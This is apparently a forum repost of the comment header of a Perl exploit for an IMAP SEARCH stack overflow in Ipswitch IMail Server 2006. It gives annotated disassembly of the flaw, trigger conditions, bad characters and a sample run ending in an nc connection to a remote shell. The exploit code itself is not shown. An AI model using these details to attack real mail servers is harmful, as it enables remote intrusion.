IPSwitch IMail Server 2006 SEARCH Remote Stack Overflow Exploit
[code]#!/use/bin/perl#
# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit
# Author: ZhenHan.Liu#ph4nt0m.org
# Date: 2007-07-25
# Team: Ph4nt0m Security Team ([url]http://www.ph4nt0m.org[/url])
#
# Vuln Found by: Manuel Santamarina Suarez
# [url]http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563[/url]
#
# The Vuln code is here (imap4d32.exe version 6.8.8.1)
# 00418CCA |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
# 00418CD0 |. 0FBE11 |MOVSX EDX,BYTE PTR DS:[ECX]
# 00418CD3 |. 83FA 22 |CMP EDX,22
# 00418CD6 |. 75 2A |JNZ SHORT IMAP4D32.00418D02
# 00418CD8 |. 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
# 00418CDE |. 50 |PUSH EAX ; /String
# 00418CDF |. FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; \lstrlenA
# 00418CE5 |. 83E8 02 |SUB EAX,2
# 00418CE8 |. 50 |PUSH EAX ; /maxlen
# 00418CE9 |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] ; |
# 00418CEF |. 83C1 01 |ADD ECX,1 ; |
# 00418CF2 |. 51 |PUSH ECX ; |src
# 00418CF3 |. 8D55 AC |LEA EDX,DWORD PTR SS:[EBP-54] ; |
# 00418CF6 |. 52 |PUSH EDX ; |dest
# 00418CF7 |. FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>] ; \strncpy
# 00418CFD |. 83C4 0C |ADD ESP,0C
# 00418D00 |. EB 13 |JMP SHORT IMAP4D32.00418D15
# 00418D02 |> 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
# 00418D08 |. 50 |PUSH EAX ; /src
# 00418D09 |. 8D4D AC |LEA ECX,DWORD PTR SS:[EBP-54] ; |
# 00418D0C |. 51 |PUSH ECX ; |dest
# 00418D0D |. E8 7E610100 |CALL <JMP.&MSVCR71.strcpy> ; \strcpy
# 00418D12 |. 83C4 08 |ADD ESP,8
#
# The programmer has made an extreamly stupid mistake.
# He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy,
# else strncpy.
# the buffer overflow takes place when the strcpy is called.
# But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src));
# So, whether the command was started with a '"' or not, the stack overflow will take place immediately.
#
# Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON".
# But others like "SEARCH BEFORE" command will also trigger the overflow.
#
# NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!!
#
# Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20
#
# Tested On Windows 2003 SP1 CN
#
# D:\>perl imap.pl 192.168.226.128 143
# * OK IMAP4 Server (IMail 9.10)
# 0 OK LOGIN completed
# * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
# * 1 EXISTS
# * 1 RECENT
# * OK [UIDVALIDITY 1185337300] UIDs valid
# * OK [UIDNEXT 485337302] Predicted next UID
# 2 OK [READ-WRITE] SELECT completed
# -------------- [BEGIN] -------------------
# ---------------- [END] ------------------
#
#
# D:\>nc -vv -n 192.168.226.128 1154
# (UNKNOWN) [192.168.226.128] 1154 (?) open
# Microsoft Windows [°
页:
[1]